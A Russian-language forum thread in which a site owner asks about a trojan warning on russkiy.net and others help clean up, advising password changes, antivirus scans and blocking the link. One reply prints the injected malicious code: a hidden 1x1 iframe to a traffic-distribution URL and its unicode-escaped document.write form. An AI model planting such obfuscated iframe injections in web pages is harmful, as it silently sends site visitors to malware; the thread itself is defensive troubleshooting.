Есть ли инфекция на russkiy.net?

[Ilya V. Dolgushin]

Поругали за то, что на сайте russkiy.net касперский метерится на обнаружение трояна.
Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто.
Может ли кто-нибудь сказать истину и, если есть вредоносный код, помочь/подсказать удалить его.
Спасибо.

[shumbola]

Цитата:

Сообщение от Ilya V. Dolgushin

Поругали за то, что на сайте russkiy.net касперский метерится на обнаружение трояна.
Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто.
Может ли кто-нибудь сказать истину и, если есть вредоносный код, помочь/подсказать удалить его.
Спасибо.

Внедрили следующее:

<iframe width=1 height=1 border=0 frameborder=0 src="http://scaned.info/tds/in.cgi?2"></iframe>

в коде это выглядить как:

<script type="text/javascript">document.write('\u003c\u0069\u0066\u00 72\u0061\u006d\u0065\u0020\u0077\u0069\u0064\u0074 \u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u 0068\u0074\u003d\u0031\u0020\u0062\u006f\u0072\u00 64\u0065\u0072\u003d\u0030\u0020\u0066\u0072\u0061 \u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u 003d\u0030\u0020\u0073\u0072\u0063\u003d\u0022\u00 68\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0063 \u0061\u006e\u0065\u0064\u002e\u0069\u006e\u0066\u 006f\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u00 2e\u0063\u0067\u0069\u003f\u0032\u0022\u003e\u003c \u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
</script>

Что делать? Для начала удалить этот script. Потом обследовать как они это внедрили и принять соотв. меры

[Dmitry Paleev]

1) Проверить персональный компьютер антивирусом. Вполне возможно что подцепили вирус.
2) Сменить пароли на доступ к фтп сервера и административную панель управления сайтом.
3) Заблокировать в межсетевом экране вредоносную ссылку.

[Ilya V. Dolgushin]

Скрипт удалён. Есть вероятность что поломали пароль админки Джомлы.
Удалил скрипт, поменял пароль, удалил из списка зарегистрированных пользователей тех, кто вызывал подозрение.
По поводу своего компьютера, странно, но bin2 появлояется даже после после полного форматирования диска. Где он мог застрять - вопрос.
ftp-данные поменял. Прогнал по новой проверку на вирусы, ничего не выявил. Но, как я уже писал, программа bin2 не удаляется даже после форматирования.
Продолжаю искать причину.

[Ruslan Juldashev]

Цитата:

Сообщение от Ilya V. Dolgushin

По поводу своего компьютера, странно, но bin2 появлояется даже после после полного форматирования диска. Где он мог застрять - вопрос.
ftp-данные поменял. Прогнал по новой проверку на вирусы, ничего не выявил. Но, как я уже писал, программа bin2 не удаляется даже после форматирования.

Следовательно bin2 находится в какой-то из сохраннёных папок, и запускается, либо через внедрённый в другие программы код, либо через autorun в какой-то из папок.

[Meylikulov Olim]

от Джумлы пароли можешь не менять=)
1.[Для веб-рерсура] находишь комп, где нету вирусов и всякой гадости, и с этого компа меняешь пароли фтп для твоего сайта.

2.[Для заражённого компа] находишь комп, где установлен касперыч с последними базами(желательно 7 версии), подключаешь свой винт, и начинаешь сканить.

[Ilya V. Dolgushin]

Цитата:

Сообщение от Ruslan Yuldashev

Следовательно bin2 находится в какой-то из сохраннёных папок, и запускается, либо через внедрённый в другие программы код, либо через autorun в какой-то из папок.

Руслан, так я хард полностью, весь форматнул, разбил диск, систему поставил по новой. Установил дрова и спустя некоторое время на рабочем столе повляется гадкий bin2. Вот я и интересуюсь, куда он мог спрятаться?
Сейчас третий раз переустанавливал систему, пока что всё в норме... Может это прямая атака на мою машину?

Оффтоп:

Может великий магистр шаманит там что-нибудь?

Цитата:

Сообщение от Meylikulov Olim

от Джумлы пароли можешь не менять=)

Почему? На всякий пожарный пусть будет

Цитата:

Сообщение от Meylikulov Olim

1.[Для веб-рерсура] находишь комп, где нету вирусов и всякой гадости, и с этого компа меняешь пароли фтп для твоего сайта.

Сделано...

Цитата:

Сообщение от Meylikulov Olim

2.[Для заражённого компа] находишь комп, где установлен касперыч с последними базами(желательно 7 версии), подключаешь свой винт, и начинаешь сканить.

Сделано...
Обнаруженых вирусов - 0.
Но что-то всё-равно страшно.

[Meylikulov Olim]

Цитата:

Обнаруженых вирусов - 0.

странно...
антивирь какой?

[Evgeniy Sklyarevskiy]

Еще посоветую после каждой связи по ФТП менять пароли или в ФТП-клиенте или в Плеске на доступ по ФТП. Так как комп сам конектится и что-то сам меняет на сервере, причем антивирус эту фигню не ловит.

[Meylikulov Olim]

Цитата:

Еще посоветую после каждой связи по ФТП менять пароли или в ФТП-клиенте или в Плеске на доступ по ФТП. Так как комп сам конектится и что-то сам меняет на сервере, причем антивирус эту фигню не ловит.

пароли скорей всего уходят в ботнет, а там уже масссивно внедряют код